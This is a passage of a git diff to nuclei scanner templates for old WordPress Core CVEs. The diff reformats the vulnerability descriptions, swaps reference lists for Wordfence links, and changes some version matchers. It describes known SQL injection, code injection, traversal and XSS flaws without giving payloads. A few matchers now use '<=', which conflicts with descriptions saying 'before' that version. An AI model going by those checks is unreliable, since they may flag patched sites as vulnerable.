CVE-2005-4463. The menu-header.php vector is already covered by CVE-2005-2110. Other vectors might be covered by CVE-2005-1688. NOTE: if the typical installation of WordPress does not list any site-specific files to wp-includes, then vector [13] is not an exposure. reference: - - http://NeoSecurityTeam.net/advisories/Advisory-17.txt - - http://secunia.com/advisories/19050 - - http://www.securityfocus.com/archive/1/426304/100/0/threaded - - http://www.vupen.com/english/advisories/2006/0777 - - http://www.securityfocus.com/archive/1/426574/100/0/threaded - - http://www.securityfocus.com/archive/1/426504/100/0/threaded - - https://wordpress.org/news/2006/03/security-202/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/06e4d7e3-c800-4b3d-9504-c69aa9a918fb?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 diff --git a/nuclei-templates/CVE-2006/CVE-2006-1012.yaml b/nuclei-templates/CVE-2006/CVE-2006-1012.yaml index 5a27db212e..f0b05283a2 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-1012.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-1012.yaml @@ -1,17 +1,14 @@ id: CVE-2006-1012 info: - name: "WordPress Core <= 1.5.2 - SQL Injection" + name: > + WordPress Core <= 1.5.2 - SQL Injection author: topscoder severity: high - description: "SQL injection vulnerability in WordPress 1.5.2, and possibly other versions before 2.0, allows remote attackers to execute arbitrary SQL commands via the User-Agent field in an HTTP header for a comment." + description: > + SQL injection vulnerability in WordPress 1.5.2, and possibly other versions before 2.0, allows remote attackers to execute arbitrary SQL commands via the User-Agent field in an HTTP header for a comment. reference: - - http://www.securityfocus.com/bid/16950 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/25321 - - http://www.gentoo.org/security/en/glsa/glsa-200603-01.xml - - http://secunia.com/advisories/19123 - - http://secunia.com/advisories/19109 - - https://wordpress.org/news/2005/12/wp2/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8ba30cbb-7a20-47aa-bbd6-82fdb27d4705?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 diff --git a/nuclei-templates/CVE-2006/CVE-2006-1263.yaml b/nuclei-templates/CVE-2006/CVE-2006-1263.yaml index d94a55fcb4..cabda3faea 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-1263.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-1263.yaml @@ -1,13 +1,14 @@ id: CVE-2006-1263 info: - name: "WordPress Core < 2.0.2 - Reflected Cross-Site Scripting" + name: > + WordPress Core < 2.0.2 - Reflected Cross-Site Scripting author: topscoder severity: medium - description: "Multiple 'unannounced' cross-site scripting (XSS) vulnerabilities in WordPress before 2.0.2 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors." + description: > + Multiple "unannounced" cross-site scripting (XSS) vulnerabilities in WordPress before 2.0.2 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors. reference: - - http://wordpress.org/development/2006/03/security-202/ - - https://www.tenable.com/plugins/nessus/125680 + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c8313827-f3ce-451d-869a-99684f58daff?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -31,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 2.0.2') - - compare_versions(version_by_js, '< 2.0.2') - - compare_versions(version_by_css, '< 2.0.2') + - compare_versions(version_by_generator, '<= 2.0.2') + - compare_versions(version_by_js, '<= 2.0.2') + - compare_versions(version_by_css, '<= 2.0.2') - type: status status: diff --git a/nuclei-templates/CVE-2006/cve-2006-1681.yaml b/nuclei-templates/CVE-2006/CVE-2006-1681.yaml similarity index 100% rename from nuclei-templates/CVE-2006/cve-2006-1681.yaml rename to nuclei-templates/CVE-2006/CVE-2006-1681.yaml diff --git a/nuclei-templates/CVE-2006/CVE-2006-1796.yaml b/nuclei-templates/CVE-2006/CVE-2006-1796.yaml index b0a9a1d3cb..0bd35c7234 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-1796.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-1796.yaml @@ -1,14 +1,14 @@ id: CVE-2006-1796 info: - name: "WordPress Core < 2.0.1 - Cross-Site Scripting" + name: > + WordPress Core < 2.0.1 - Cross-Site Scripting author: topscoder severity: medium - description: "Cross-site scripting (XSS) vulnerability in the paging links functionality in template-functions-links.php in Wordpress 1.5.2, and possibly other versions before 2.0.1, allows remote attackers to inject arbitrary web script or HTML to Internet Explorer users via the request URI ($_SERVER['REQUEST_URI'])." + description: > + Cross-site scripting (XSS) vulnerability in the paging links functionality in template-functions-links.php in Wordpress 1.5.2, and possibly other versions before 2.0.1, allows remote attackers to inject arbitrary web script or HTML to Internet Explorer users via the request URI ($_SERVER['REQUEST_URI']). reference: - - http://trac.wordpress.org/ticket/1686 - - http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=328909 - - https://wordpress.org/news/2006/01/201-release/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8d874540-dced-420d-81c0-46c185df10f1?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 diff --git a/nuclei-templates/CVE-2006/CVE-2006-2667.yaml b/nuclei-templates/CVE-2006/CVE-2006-2667.yaml index 018556cc24..ae6665d865 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-2667.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-2667.yaml @@ -1,21 +1,14 @@ id: CVE-2006-2667 info: - name: "WordPress Core < 2.0.3 - Remote Code Execution" + name: > + WordPress Core < 2.0.3 - Remote Code Execution author: topscoder severity: high - description: "Direct static code injection vulnerability in WordPress 2.0.2 and earlier allows remote attackers to execute arbitrary commands by inserting a carriage return and PHP code when updating a profile, which is appended after a special comment sequence into files in (1) wp-content/cache/userlogins/ (2) wp-content/cache/users/ which are later included by cache.php, as demonstrated using the displayname argument." + description: > + Direct static code injection vulnerability in WordPress 2.0.2 and earlier allows remote attackers to execute arbitrary commands by inserting a carriage return and PHP code when updating a profile, which is appended after a special comment sequence into files in (1) wp-content/cache/userlogins/ (2) wp-content/cache/users/ which are later included by cache.php, as demonstrated using the displayname argument. reference: - - http://secunia.com/advisories/20271 - - http://www.osvdb.org/25777 - - http://www.vupen.com/english/advisories/2006/1992 - - http://secunia.com/advisories/20608 - - http://www.gentoo.org/security/en/glsa/glsa-200606-08.xml - - http://www.securityfocus.com/bid/18372 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/26687 - - http://retrogod.altervista.org/wordpress_202_xpl.html - - http://www.securityfocus.com/archive/1/435039/100/0/threaded - - https://wordpress.org/news/2006/06/wordpress-203/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cc0d15ab-e0a4-4ac5-8558-23aeaf00b11a?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 diff --git a/nuclei-templates/CVE-2006/CVE-2006-2702.yaml b/nuclei-templates/CVE-2006/CVE-2006-2702.yaml index fc550503b2..39fdda8baf 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-2702.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-2702.yaml @@ -1,20 +1,14 @@ id: CVE-2006-2702 info: - name: "WordPress Core < 2.0.3 - IP Address Spoofing" + name: > + WordPress Core < 2.0.3 - IP Address Spoofing author: topscoder severity: medium - description: "vars.php in WordPress 2.0.2, possibly when running on Mac OS X, allows remote attackers to spoof their IP address via a PC_REMOTE_ADDR HTTP header, which vars.php uses to redefine $_SERVER['REMOTE_ADDR']." + description: > + vars.php in WordPress 2.0.2, possibly when running on Mac OS X, allows remote attackers to spoof their IP address via a PC_REMOTE_ADDR HTTP header, which vars.php uses to redefine $_SERVER['REMOTE_ADDR']. reference: - - http://secunia.com/advisories/20271 - - http://www.vupen.com/english/advisories/2006/1992 - - http://www.osvdb.org/25935 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/26688 - - http://secunia.com/advisories/20608 - - http://www.gentoo.org/security/en/glsa/glsa-200606-08.xml - - http://retrogod.altervista.org/wordpress_202_xpl.html - - http://www.securityfocus.com/archive/1/435039/100/0/threaded - - https://wordpress.org/news/2006/06/wordpress-203/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/71b521b5-acb5-4439-90f8-7d341291d583?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 diff --git a/nuclei-templates/CVE-2006/CVE-2006-3390.yaml b/nuclei-templates/CVE-2006/CVE-2006-3390.yaml index 33735ea12b..6b628361e5 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-3390.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-3390.yaml @@ -1,20 +1,14 @@ id: CVE-2006-3390 info: - name: "WordPress Core < 2.0.4 - Full Path Disclosure" + name: > + WordPress Core < 2.0.4 - Full Path Disclosure author: topscoder severity: medium - description: "WordPress 2.0.3 allows remote attackers to obtain the installation path via a direct request to various files, such as those in the (1) wp-admin, (2) wp-content, and (3) wp-includes directories, possibly due to uninitialized variables." + description: > + WordPress 2.0.3 allows remote attackers to obtain the installation path via a direct request to various files, such as those in the (1) wp-admin, (2) wp-content, and (3) wp-includes directories, possibly due to uninitialized variables. reference: - - http://securityreason.com/securityalert/1187 - - http://secunia.com/advisories/20928 - - http://secunia.com/advisories/21447 - - http://www.securityfocus.com/bid/18779 - - http://www.securityfocus.com/archive/1/439062/100/0/threaded - - http://security.gentoo.org/glsa/glsa-200608-19.xml - - http://www.vupen.com/english/advisories/2006/2661 - - http://www.securityfocus.com/archive/1/438942/100/0/threaded - - https://wordpress.org/news/2006/07/wordpress-204/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/159b5565-f4d8-4514-9397-20b6a0890475?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 diff --git a/nuclei-templates/CVE-2006/CVE-2006-4028.yaml b/nuclei-templates/CVE-2006/CVE-2006-4028.yaml index 6a58bc6ef8..1dff38a878 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-4028.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-4028.yaml @@ -1,14 +1,14 @@ id: CVE-2006-4028 info: - name: "WordPress Core < 2.0.4 - Privilege Escalation" + name: > + WordPress Core < 2.0.4 - Privilege Escalation author: topscoder severity: critical - description: "Multiple unspecified vulnerabilities in WordPress before 2.0.4 have unknown impact and remote attack vectors. NOTE: due to lack of details, it is not clear how these issues are different from CVE-2006-3389 and CVE-2006-3390, although it is likely that 2.0.4 addresses an unspecified issue related to 'Anyone can register' functionality (user registration for guests)." + description: > + Multiple unspecified vulnerabilities in WordPress before 2.0.4 have unknown impact and remote attack vectors. NOTE: due to lack of details, it is not clear how these issues are different from CVE-2006-3389 and CVE-2006-3390, although it is likely that 2.0.4 addresses an unspecified issue related to "Anyone can register" functionality (user registration for guests). reference: - - http://wordpress.org/development/2006/07/wordpress-204/ - - http://unknowngenius.com/blog/archives/2006/07/27/followup-on-wordpress/ - - http://unknowngenius.com/blog/archives/2006/07/26/critical-announcement-to-all-wordpress-users/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ab6e751-dc23-442f-b22e-ee41fd6651f6?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -32,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 2.0.4') - - compare_versions(version_by_js, '< 2.0.4') - - compare_versions(version_by_css, '< 2.0.4') + - compare_versions(version_by_generator, '<= 2.0.4') + - compare_versions(version_by_js, '<= 2.0.4') + - compare_versions(version_by_css, '<= 2.0.4') - type: status status: diff --git a/nuclei-templates/CVE-2006/CVE-2006-4208.yaml b/nuclei-templates/CVE-2006/CVE-2006-4208.yaml index 02de78b64f..02ce605fab 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-4208.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-4208.yaml @@ -1,19 +1,14 @@ id: CVE-2006-4208 info: - name: "Skippy WP-DB Backup (Legacy Plugin) <= 1.7 - Authenticated (Admin+) Directory Traversal" + name: > + Skippy WP-DB Backup (Legacy Plugin) <= 1.7 - Authenticated (Admin+) Directory Traversal author: topscoder severity: medium - description: "Directory traversal vulnerability in wp-db-backup.php in the Skippy WP-DB-Backup legacy plugin for WordPress 1.7 and earlier allows remote authenticated users with administrative privileges to read arbitrary files via a .. (dot dot) in the backup parameter to edit.php." + description: > + Directory traversal vulnerability in wp-db-backup.php in the Skippy WP-DB-Backup legacy plugin for WordPress 1.7 and earlier allows remote authenticated users with administrative privileges to read arbitrary files via a .. (dot dot) in the backup parameter to edit.php. reference: - - http://secunia.com/advisories/21486 - - http://trac.wordpress.org/changeset/4095 - - http://www.skippy.net/blog/category/wordpress/plugins/wp-db-backup/ - - https://exchange.xforce.ibmcloud.com/vulnerabilities/28375 - - http://www.securityfocus.com/bid/19504 - - http://securityreason.com/securityalert/1401 - - http://www.securityfocus.com/archive/1/443181/100/0/threaded - - http://www.vupen.com/english/advisories/2006/3280 + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e38b567-9567-4b08-8fab-3971547394b0?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N cvss-score: 5.5 diff --git a/nuclei-templates/CVE-2006/CVE-2006-4743.yaml b/nuclei-templates/CVE-2006/CVE-2006-4743.yaml index 3a0b3da95a..c6397bf9b8 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-4743.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-4743.yaml @@ -1,16 +1,14 @@ id: CVE-2006-4743 info: - name: "WordPress Core 2.0.2 - 2.0.5 - Sensitive Information Disclosure" + name: > + WordPress Core 2.0.2 - 2.0.5 - Sensitive Information Disclosure author: topscoder severity: medium - description: "WordPress 2.0.2 through 2.0.5 allows remote attackers to obtain sensitive information via a direct request for (1) 404.php, (2) akismet.php, (3) archive.php, (4) archives.php, (5) attachment.php, (6) blogger.php, (7) comments.php, (8) comments-popup.php, (9) dotclear.php, (10) footer.php, (11) functions.php, (12) header.php, (13) hello.php, (14) wp-content/themes/default/index.php, (15) links.php, (16) livejournal.php, (17) mt.php, (18) page.php, (19) rss.php, (20) searchform.php, (21) search.php, (22) sidebar.php, (23) single.php, (24) textpattern.php, (25) upgrade-functions.php, (26) upgrade-schema.php, or (27) wp-db-backup.php, which reveal the path in various error messages. NOTE: another researcher has disputed the details of this report, stating that version 2.0.5 does not exist. NOTE: the admin-footer.php, admin-functions.php, default-filters.php, edit-form-advanced.php, edit-link-form.php, edit-page-form.php, kses.php, locale.php, rss-functions.php, template-loader.php, and wp-db.php vectors are already covered by CVE-2006-0986. The edit-form-comment.php, vars.php, and wp-settings.php vectors are already covered by CVE-2005-4463. The menu-header.php vector is already covered by CVE-2005-2110." + description: > + WordPress 2.0.2 through 2.0.5 allows remote attackers to obtain sensitive information via a direct request for (1) 404.php, (2) akismet.php, (3) archive.php, (4) archives.php, (5) attachment.php, (6) blogger.php, (7) comments.php, (8) comments-popup.php, (9) dotclear.php, (10) footer.php, (11) functions.php, (12) header.php, (13) hello.php, (14) wp-content/themes/default/index.php, (15) links.php, (16) livejournal.php, (17) mt.php, (18) page.php, (19) rss.php, (20) searchform.php, (21) search.php, (22) sidebar.php, (23) single.php, (24) textpattern.php, (25) upgrade-functions.php, (26) upgrade-schema.php, or (27) wp-db-backup.php, which reveal the path in various error messages. NOTE: another researcher has disputed the details of this report, stating that version 2.0.5 does not exist. NOTE: the admin-footer.php, admin-functions.php, default-filters.php, edit-form-advanced.php, edit-link-form.php, edit-page-form.php, kses.php, locale.php, rss-functions.php, template-loader.php, and wp-db.php vectors are already covered by CVE-2006-0986. The edit-form-comment.php, vars.php, and wp-settings.php vectors are already covered by CVE-2005-4463. The menu-header.php vector is already covered by CVE-2005-2110. reference: - - http://www.securityfocus.com/archive/1/445374/100/0/threaded - - http://www.securityfocus.com/archive/1/445471/100/0/threaded - - http://www.securityfocus.com/archive/1/445711/100/0/threaded - - http://www.securityfocus.com/archive/1/445604/100/0/threaded - - https://wordpress.org/news/2007/01/wordpress-206/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f50bca0a-7089-4b4e-820f-d311fdb88cf1?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 diff --git a/nuclei-templates/CVE-2006/CVE-2006-5705.yaml b/nuclei-templates/CVE-2006/CVE-2006-5705.yaml index 3d36043f75..0b389cc63b 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-5705.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-5705.yaml @@ -1,22 +1,14 @@ id: CVE-2006-5705 info: - name: "WordPress Core <= 2.0.4 - Directory Traversal" + name: > + WordPress Core <= 2.0.4 - Directory Traversal author: topscoder severity: medium - description: "Multiple directory traversal vulnerabilities in plugins/wp-db-backup.php in WordPress before 2.0.5 allow remote authenticated users to read or overwrite arbitrary files via directory traversal sequences in the (1) backup and (2) fragment parameters in a GET request." + description: > + Multiple directory traversal vulnerabilities in plugins/wp-db-backup.php in WordPress before 2.0.5 allow remote authenticated users to read or overwrite arbitrary files via directory traversal sequences in the (1) backup and (2) fragment parameters in a GET request. reference: - - http://markjaquith.wordpress.com/2006/10/17/changes-in-wordpress-205/ - - http://wordpress.org/development/2006/10/205-ronan/ - - http://www.gentoo.org/security/en/glsa/glsa-200611-10.xml - - http://www.openpkg.org/security/advisories/OpenPKG-SA-2006.027-wordpress.html - - http://secunia.com/advisories/22942 - - http://www.securityfocus.com/bid/20869 - - http://secunia.com/advisories/22683 - - http://trac.wordpress.org/changeset/4226 - - http://bugs.gentoo.org/show_bug.cgi?id=153303 - - http://www.vupen.com/english/advisories/2006/4307 - - https://wordpress.org/news/2006/10/205-ronan/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/83ec5fa5-2fd9-4c7d-a2f1-de885746d2d3?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 diff --git a/nuclei-templates/CVE-2006/CVE-2006-6016.yaml b/nuclei-templates/CVE-2006/CVE-2006-6016.yaml index b2fc60ba9b..215afd28e5 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-6016.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-6016.yaml @@ -1,16 +1,14 @@ id: CVE-2006-6016 info: - name: "WordPress Core < 2.0.5 - User Metadata Information Disclosure" + name: > + WordPress Core < 2.0.5 - User Metadata Information Disclosure author: topscoder severity: medium - description: "wp-admin/user-edit.php in WordPress before 2.0.5 allows remote authenticated users to read the metadata of an arbitrary user via a modified user_id parameter." + description: > + wp-admin/user-edit.php in WordPress before 2.0.5 allows remote authenticated users to read the metadata of an arbitrary user via a modified user_id parameter. reference: - - http://trac.wordpress.org/ticket/3142 - - http://www.gentoo.org/security/en/glsa/glsa-200611-10.xml - - http://bugs.gentoo.org/show_bug.cgi?id=153303 - - https://wordpress.org/news/2006/10/205-ronan/ - - https://core.trac.wordpress.org/attachment/ticket/3142/3142-2.0.5.diff + - https://www.wordfence.com/threat-intel/vulnerabilities/id/91531e13-5344-442c-99d3-8ccfd61b715d?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 diff --git a/nuclei-templates/CVE-2006/CVE-2006-6017.yaml b/nuclei-templates/CVE-2006/CVE-2006-6017.yaml index 4ef756972a..8e6da1c497 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-6017.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-6017.yaml @@ -1,15 +1,14 @@ id: CVE-2006-6017 info: - name: "WordPress Core <= 2.0.4 - Denial of Service" + name: > + WordPress Core <= 2.0.4 - Denial of Service author: topscoder severity: medium - description: "WordPress before 2.0.5 does not properly store a profile containing a string representation of a serialized object, which allows remote authenticated users to cause a denial of service (application crash) via a string that represents a (1) malformed or (2) large serialized object, because the object triggers automatic unserialization for display." + description: > + WordPress before 2.0.5 does not properly store a profile containing a string representation of a serialized object, which allows remote authenticated users to cause a denial of service (application crash) via a string that represents a (1) malformed or (2) large serialized object, because the object triggers automatic unserialization for display. reference: - - http://www.gentoo.org/security/en/glsa/glsa-200611-10.xml - - http://trac.wordpress.org/ticket/2591 - - http://bugs.gentoo.org/show_bug.cgi?id=153303 - - https://wordpress.org/news/2006/10/205-ronan/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/be4515d8-0d5d-4925-a9a4-64ba9d51fe02?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H cvss-score: 6.5 diff --git a/nuclei-templates/CVE-2006/CVE-2006-6808.yaml b/nuclei-templates/CVE-2006/CVE-2006-6808.yaml index e8f568c475..6e2fd421a4 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-6808.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-6808.yaml @@ -1,21 +1,14 @@ id: CVE-2006-6808 info: - name: "WordPress Core <= 2.0.5 - Cross-Site Scripting" + name: > + WordPress Core <= 2.0.5 - Cross-Site Scripting author: topscoder severity: medium - description: "Cross-site scripting (XSS) vulnerability in wp-admin/templates.php in WordPress 2.0.5 allows remote attackers to inject arbitrary web script or HTML via the file parameter. NOTE: some sources have reported this as a vulnerability in the get_file_description function in wp-admin/admin-functions.php." + description: > + Cross-site scripting (XSS) vulnerability in wp-admin/templates.php in WordPress 2.0.5 allows remote attackers to inject arbitrary web script or HTML via the file parameter. NOTE: some sources have reported this as a vulnerability in the get_file_description function in wp-admin/admin-functions.php. reference: - - http://www.vupen.com/english/advisories/2006/5191 - - http://secunia.com/advisories/23587 - - http://secunia.com/advisories/23741 - - http://trac.wordpress.org/changeset/4665 - - http://security.gentoo.org/glsa/glsa-200701-10.xml - - http://www.securityfocus.com/bid/21782 - - http://marc.info/?l=full-disclosure&m=116722128631087&w=2 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/31133 - - http://michaeldaw.org/ - - https://wordpress.org/news/2007/01/wordpress-206/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4deae680-4829-4e24-b67b-4066ec9ce4da?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N cvss-score: 6.4 diff --git a/nuclei-templates/CVE-2007/CVE-2007-0106.yaml b/nuclei-templates/CVE-2007/CVE-2007-0106.yaml index 02ae57ba3c..d00e2d7ff6 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-0106.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-0106.yaml @@ -1,20 +1,14 @@ id: CVE-2007-0106 info: - name: "WordPress Core <= 2.0.5 - Cross-Site Request Forgery to Cross-Site Scripting" + name: > + WordPress Core <= 2.0.5 - Cross-Site Request Forgery to Cross-Site Scripting author: topscoder severity: high - description: "Cross-site scripting (XSS) vulnerability in the CSRF protection scheme in WordPress before 2.0.6 allows remote attackers to inject arbitrary web script or HTML via a CSRF attack with an invalid token and quote characters or HTML tags in URL variable names, which are not properly handled when WordPress generates a new link to verify the request." + description: > + Cross-site scripting (XSS) vulnerability in the CSRF protection scheme in WordPress before 2.0.6 allows remote attackers to inject arbitrary web script or HTML via a CSRF attack with an invalid token and quote characters or HTML tags in URL variable names, which are not properly handled when WordPress generates a new link to verify the request. reference: - - http://securityreason.com/securityalert/2114 - - http://www.securityfocus.com/archive/1/456048/100/0/threaded - - http://wordpress.org/development/2007/01/wordpress-206/ - - http://secunia.com/advisories/23595 - - http://osvdb.org/33397 - - http://www.vupen.com/english/advisories/2007/0061 - - http://www.securityfocus.com/bid/21893 - - http://www.hardened-php.net/advisory_012007.140.html - - https://wordpress.org/news/2007/01/wordpress-206/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/37f7f9ef-d57a-41e9-bd2c-2aa04a82b6c4?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 8.8 diff --git a/nuclei-templates/CVE-2007/CVE-2007-0107.yaml b/nuclei-templates/CVE-2007/CVE-2007-0107.yaml index cf83638e73..830963184e 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-0107.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-0107.yaml @@ -1,24 +1,14 @@ id: CVE-2007-0107 info: - name: "WordPress Core <= 2.0.5 - SQL Injection" + name: > + WordPress Core <= 2.0.5 - SQL Injection author: topscoder severity: critical - description: "WordPress before 2.0.6, when mbstring is enabled for PHP, decodes alternate character sets after escaping the SQL query, which allows remote attackers to bypass SQL injection protection schemes and execute arbitrary SQL commands via multibyte charsets, as demonstrated using UTF-7." + description: > + WordPress before 2.0.6, when mbstring is enabled for PHP, decodes alternate character sets after escaping the SQL query, which allows remote attackers to bypass SQL injection protection schemes and execute arbitrary SQL commands via multibyte charsets, as demonstrated using UTF-7. reference: - - https://exchange.xforce.ibmcloud.com/vulnerabilities/31297 - - http://www.securityfocus.com/bid/21907 - - http://secunia.com/advisories/23741 - - http://www.openpkg.com/security/advisories/OpenPKG-SA-2007.005.html - - http://security.gentoo.org/glsa/glsa-200701-10.xml - - http://osvdb.org/31579 - - http://wordpress.org/development/2007/01/wordpress-206/ - - http://secunia.com/advisories/23595 - - http://www.securityfocus.com/archive/1/456049/100/0/threaded - - http://www.vupen.com/english/advisories/2007/0061 - - http://www.hardened-php.net/advisory_022007.141.html - - http://securityreason.com/securityalert/2112 - - https://wordpress.org/news/2007/01/wordpress-206/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f4393526-6357-40ee-a024-f461d0430a62?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 diff --git a/nuclei-templates/CVE-2007/CVE-2007-0109.yaml b/nuclei-templates/CVE-2007/CVE-2007-0109.yaml index 1011316ab3..96e637ad11 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-0109.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-0109.yaml @@ -1,20 +1,14 @@ id: CVE-2007-0109 info: - name: "WordPress < 2.0.6 - Username Enumeration via Error Messages" + name: > + WordPress < 2.0.6 - Username Enumeration via Error Messages author: topscoder severity: medium - description: "wp-login.php in WordPress 2.0.5 and earlier displays different error messages if a user exists or not, which allows remote attackers to obtain sensitive information and facilitates brute force attacks." + description: > + wp-login.php in WordPress 2.0.5 and earlier displays different error messages if a user exists or not, which allows remote attackers to obtain sensitive information and facilitates brute force attacks. reference: - - http://osvdb.org/31577 - - http://secunia.com/advisories/23621 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/31262 - - http://secunia.com/advisories/23741 - - http://security.gentoo.org/glsa/glsa-200701-10.xml - - http://www.vupen.com/english/advisories/2007/0062 - - http://www.securityfocus.com/archive/1/455927/100/0/threaded - - http://securityreason.com/securityalert/2113 - - https://wordpress.org/news/2007/01/wordpress-206/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1f2845a5-7572-4533-8949-08bee99fca20?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 diff --git a/nuclei-templates/CVE-2007/CVE-2007-0233.yaml b/nuclei-templates/CVE-2007/CVE-2007-0233.yaml index 25112da0d8..96481eeebe 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-0233.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-0233.yaml @@ -1,16 +1,14 @@ id: CVE-2007-0233 info: - name: "WordPress Core < 2.0.7 - SQL Injection" + name: > + WordPress Core < 2.0.7 - SQL Injection author: topscoder severity: high - description: "wp-trackback.php in WordPress 2.0.6 and earlier does not properly unset variables when the input data includes a numeric parameter with a value matching an alphanumeric parameter's hash value, which allows remote attackers to execute arbitrary SQL commands via the tb_id parameter. NOTE: it could be argued that this vulnerability is due to a bug in the unset PHP command (CVE-2006-3017) and the proper fix should be in PHP; if so, then this should not be treated as a vulnerability in WordPress." + description: > + wp-trackback.php in WordPress 2.0.6 and earlier does not properly unset variables when the input data includes a numeric parameter with a value matching an alphanumeric parameter's hash value, which allows remote attackers to execute arbitrary SQL commands via the tb_id parameter. NOTE: it could be argued that this vulnerability is due to a bug in the unset PHP command (CVE-2006-3017) and the proper fix should be in PHP; if so, then this should not be treated as a vulnerability in WordPress. reference: - - https://www.exploit-db.com/exploits/3109 - - http://www.securityfocus.com/bid/21983 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/31385 - - http://osvdb.org/36860 - - https://wordpress.org/news/2007/01/wordpress-207/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c3b42bd3-f7d3-43d1-bdd8-4389fd82e1e9?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 diff --git a/nuclei-templates/CVE-2007/CVE-2007-0262.yaml b/nuclei-templates/CVE-2007/CVE-2007-0262.yaml index fc85da9fee..8eede2e329 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-0262.yaml +++ 